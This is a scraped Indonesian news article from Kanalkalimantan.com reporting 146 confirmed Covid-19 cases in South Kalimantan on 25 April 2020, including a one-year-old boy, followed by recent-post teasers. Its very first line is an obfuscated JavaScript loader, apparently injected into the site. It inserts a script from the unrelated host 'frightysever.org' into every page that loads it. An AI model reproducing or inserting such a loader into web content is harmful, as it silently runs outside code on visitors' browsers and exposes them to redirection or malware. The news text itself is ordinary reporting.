(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

14 Kasus Baru Positif Covid-19 di Kalsel, Satu di Antaranya Pasien Berusia 1 Tahun!


KANALKALIMANTAN.COM, BANJARBARU – Tim Gugus Tugas Pencegahan Penanganan (P2) Covid-19 Kalimantan Selatan mengungkapkan adanya penambahan kasus terkonfirmasi positif Covid-19 di Bumi Lambung Mangkurat. Tercatat, pada Sabtu (25/4/2020) sudah ada 146 kasus terkonfirmasi positif Covid-19.

Menurut Juru Bicara Tim Gugus Tugas P2 Covid-19 Kalsel Muhammad Muslim, dari total kasus yang tercatat, 124 kasus di antaranya menjalani perawatan maupun isolasi, baik isolasi mandiri ataupun karantina khusus. Sementara itu, 7 kasus meninggal dunia dan ada penambahakn kasus sembuh dari Covid-19 menjadi 15 kasus.

“Bertambahnya 14 kasus yang terkonfirmasi positif ini, di mana 2 di antaranya dari PDP (pasien dalam pengawasan) yang dirawat di RSUD Ulin dan RSUD Moch. Ansari Saleh Banjarmasin. Kemudian, 12 kasus yang dilakukan isolasi mandiri maupun karantina khusus, di antaranya 7 kasus dari Barito Kuala, 2 kasus dari Banjarmasin, 2 kasus dari Kabupaten Banjar dan satu kasus dari Tanah Laut,” beber Muslim di Banjarbaru, Sabtu (25/4/2020) sore.

Kasus baru terkonfirmasi positif Covid-19 yang dirawat di RSUD Ulin Banjarmasin dengan kode kasus KS Covid #133, yaitu seorang laki-laki berusia 62 tahun dari Kabupaten Banjar, yang sebelumnya berstatus PDP dengan kode Ulin-65. “Kemudian KS Covid #134 ini juga dari PDP dengan kode MAS-18 (dirawat di RS Moch. Ansari Saleh Banjarmasin –red), berusia 28 tahun, wanita dari Kabupaten Banjar,” kata Muslim.

Saat ini, sudah tercatat 39 kasus terkonfirmasi positif Covid-19 yang menjalani perawatan di rumah sakit. Muslim merincikan, 21 kasus tengah menjalani perawatan di RSUD Ulin Banjarmasin, 4 kasus di RSUD Moch. Ansari Saleh Banjarmasin, serta masing-masing satu kasus dirawat di RSUD Abdul Aziz Marabahan dan RSUD H. Boejasin Pelaihari.

“Kemudian 3 kasus dirawat di RSD Idaman Banjarbaru, 3 kasus dirawat di RSUD Damanhuri Barabai, 2 kasus di RSUD Badaruddin Tabalong, 3 kasus di RS Bhayangkara, serta 1 kasus di RSUD Hasan Basry Kandangan,” jelas Muslim.

Sedangkan kasus baru terkonfirmasi Covid-19 yang menjalani isolasi mandiri maupun karantina khusus dengan kode KS Covid #135 dan KS Covid #136, yang keduanya berasal dari Banjarmasin. Kemudian, KS Covid #137 berasal dari Tanah Laut dan KS Covid #138 dari Kabupaten Banjar.

Kemudian, kasus KS Covid #140, KS Covid #141, KS Covid #142, KS Covid #143, KS Covid #144, KS Covid #145 dan KS Covid #146 yang semuanya berasal dari Kabupaten Barito Kuala.

Muslim mengakui, satu kasus dari Kabupaten Banjar merupakan seorang anak berusia di bawah lima tahun (balita). “KS Covid #139 berusia satu tahun, laki-laki dari Kabupaten Banjar,” pungkas Muslim.

Sehingga kini, jumlah kasus terkonfirmasi positif Covid-19 yang menjalani isolasi mandiri maupun karantina khusus sebanyak 85 kasus. (Kanalkalimantan.com/fikri)

Reporter : Fikri
Editor : Chell


Desy Arfianty

Recent Posts

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

10 jam ago

Rekayasa Pemasangan ATSC, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

12 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

13 jam ago

Sekat Bakar Antisipasi Karhutla Ring 1 Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Provinsi Kalimantan Selatan kembali memfokuskan penanganan ancaman kebakaran hutan dan lahan (Karhutla)… Read More

13 jam ago

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul

KANALKALIMANTAN.COM, BANJARMASIN - Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota… Read More

16 jam ago

Ambulans Baru Layanan Puskesmas Keliling di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Dinas Kesehatan (Dinkes) Kota Banjarbaru hadirkan layanan kesehatan yang lebih dekat dengan… Read More

17 jam ago

This website uses cookies.